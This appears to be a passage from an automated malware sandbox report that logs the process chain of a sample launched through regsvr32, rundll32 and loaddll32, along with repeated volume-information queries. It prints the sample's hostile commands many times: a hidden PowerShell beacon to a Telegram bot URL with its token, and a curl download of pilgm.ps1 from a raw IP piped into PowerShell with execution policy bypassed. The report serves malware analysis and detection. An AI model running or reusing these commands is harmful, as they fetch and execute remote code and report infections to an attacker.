            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xyq5akbp\xyq5akbp.cmdline"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1yj35v5c\1yj35v5c.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wzlesmvi\wzlesmvi.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF462.tmp" "c:\Users\user\AppData\Local\Temp\xyq5akbp\CSC3C74FAAA7254A90B38FFB13CA21DCB4.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF463.tmp" "c:\Users\user\AppData\Local\Temp\1yj35v5c\CSC1D664DFBC1CF4D3B97F036955FDEE5EE.TMP"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF461.tmp" "c:\Users\user\AppData\Local\Temp\wzlesmvi\CSC11B817DA9D55460CBF45133E7BAA649F.TMP"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3vvszjlk\3vvszjlk.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374.tmp" "c:\Users\user\AppData\Local\Temp\3vvszjlk\CSC1C049BEBEBAF4B45B9D79F1CA1976831.TMP"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c cmd.exe /c curl -s -h "x-special-header: qinx8f3tujdhxgoefpjjbaipyase1mobj2yryo2rjngnvdhjvevn8r2ku8opcbonhmpzfb2gyqpilhjq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -noprofile -executionpolicy bypass -windowstyle hidden -command -Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F952778 cpuid 0_2_6F952778
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
